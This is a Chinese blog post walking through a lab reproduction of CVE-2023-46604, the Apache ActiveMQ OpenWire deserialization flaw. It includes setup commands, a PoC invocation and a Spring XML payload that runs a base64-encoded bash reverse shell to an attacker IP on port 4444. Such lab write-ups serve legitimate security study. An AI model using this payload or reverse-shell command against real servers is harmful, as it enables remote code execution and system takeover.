首页 > 其他分享 >CVE-2023-46604

CVE-2023-46604

时间:2024-01-19 17:37:44浏览次数:23  
标签:xml 序列化 46604 漏洞 2023 CVE poc

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞(CVE-2023-46604)

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持java消息服务、集群、Spring Framework等。

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActvieMQ5.18.2版本以及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作OpenWire协议中的序列化类型,导致代理的类路径上任何类实例化,从而执行任意命令。

漏洞环境

cd activemq/CVE-2023-46604
docker-compose up -d 
默认端口 默认条件
8161 web 需配置才可远程访问
61616 tcp 远程访问
反序列化漏洞出现在61616端口中。

漏洞复现

首先,启动一个HTTP发连接服务器,其中包含我们的poc.xml:

python3 -m http.server 6666

img

然后,执行poc.py,传入的三个参数分别是目标服务器地址、端口、以及包含poc.xml的反连平台URL:

python3 poc.py target port http://ip of http server/poc.xml

执行完成后,进入ActiveMQ容器:

docker exec cve-2023-46604-activemq-1 ls -l /tmp

反弹shell
修改xml忘记为反弹shell命令

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

img
img

shell编译成base64网站
img

标签:xml,序列化,46604,漏洞,2023,CVE,poc
From: https://www.cnblogs.com/kalixcn/p/17975156

相关文章

  • CVE-2012-1823复现练习
    环境搭建:DockerDesktop开启cd/CVE-2012-1823docker-composeup-d本地访问80端口分析PHP-CGI直接将用户的请求作为了PHP-CGI的参数执行,导致远程代码的执行。先上执行结果PHP的运行模式:CGI通用网关接口,接收网页浏览器的数据发送给web服务器,再把执行结果返回给浏览器参......
  • 实战技巧CVE-2015-0005
    启用SMB签名和通信会话签名后,应用服务器和客户端之间的所有流量都有签名验证保护,中间人gongji者因为无法伪造签名而不能与目标主机进行正常的通信。签名密钥SessionKey基于客户端账号的口令NTLM值生成,应用服务器在认证阶段从认证服务器获取;客户端采用和认证服务器相同的算法,基于自......
  • NOIP2023题解
    目录NOIP2023T1词典(dict)T2三值逻辑(tribool)T3双序列拓展(expand)T4天天爱打卡(run)NOIP2023T1词典(dict)考察:贪心题解Link题目传送门首先任意多次操作本质就是随意排序,所以如果要使\(w_i\)最小,我们一定会使\(w_i\)从\(a\)到\(z\)排,其它都\(z\)到\(a\)排......
  • 2023全国大学生电子设计竞赛H题全解 [原创www.cnblogs.com/helesheng]
    2023年又是全国大学生电子设计竞赛年,一如既往的指导学生死磕H题。8月2日看到公布的赛题,我自己还沾沾自喜,觉得今年学生用嵌入式系统和数字信号处理知识就可以完成这题,赛前都辅导过,应该成绩不差。哪想到结果大跌眼镜,不但成绩还不如往年,学生的解题思路更是各式各样……直到这几天寒......
  • CVE-2022-44268 imageMagick LFI
    ImageMagick TheImageMagickisthetoolmodifythepicture.ThefunctionofImageMagickisELFfilenamedmagick.ThevulnerabilityversionofImageMagickis7.1.0-49ExploitItwilluseImageMagicktoresizetheimage,weneedtocreateamaliciousima......
  • CCF模拟_202312-1_仓库规划
    计算机软件能力认证考试系统样例输入4200-1-1120-1样例输出3103提交:#include<iostream>usingnamespacestd;intmain(){ intn,m;//仓库数量,维度 int**a;//二维数组,存放仓库位置信息 inti,j,font,itmp,key;//这仨是存放后边的临时变量 cin>>n>......
  • 我的2023年总结:往前看,别回头
    2023年已经结束,我借此机会回顾一下我的2023年,同时也为2024年立好flag。文章目录2023回顾印象深刻的实战经历技术成长与规划技术分享与交流参加百度apollo技术讨论会深入学习Redis源码多彩的生活张杰演唱会《漫长的季节》:往前看,别回头2024展望2023回顾印象深刻的实战经历在2023年,......
  • 2023 年值得一读的技术文章 | NebulaGraph 技术社区
    在之前的产品篇,我们了解到了NebulaGraph内核及周边工具在2023年经历了什么样的变化。伴随着这些特性的变更和上线,在【文章】博客分类中,一篇篇的博文记录下了这些功能背后的设计思考和研发实践。当中,既有对内存管理MemoryTracker的原理讲解,也有对NebulaGraph的安装选择指......
  • 腾讯云存储获沙利文「2023年中国云存储市场报告」评测第一
    近日,国际权威调研机构沙利文联合头豹研究院正式发布《2023年中国云存储解决方案市场报告》,腾讯云存储位居国内厂商第一位,获增长指数和创新指数双第一,入选中国云存储解决方案市场“领导者”阵营。报告认为,腾讯云是云存储解决方案市场的领导者,聚焦用户实际应用需求,不断进行技术打......
  • 回顾 2023,NebulaGraph 的这一年的变化
    一年又过去了,感谢你和NebulaGraph一起又走过一个春夏秋冬。在这365天里,我们一起见证了214个commit带来的NebulaGraph3个中版本的上线,它们分别是v3.4.0、v3.5.0和v3.6.0;除了内核经历了3个中版本的迭代之外,NebulaGraph在2023年也迎来一大波新周边工具,以及已有......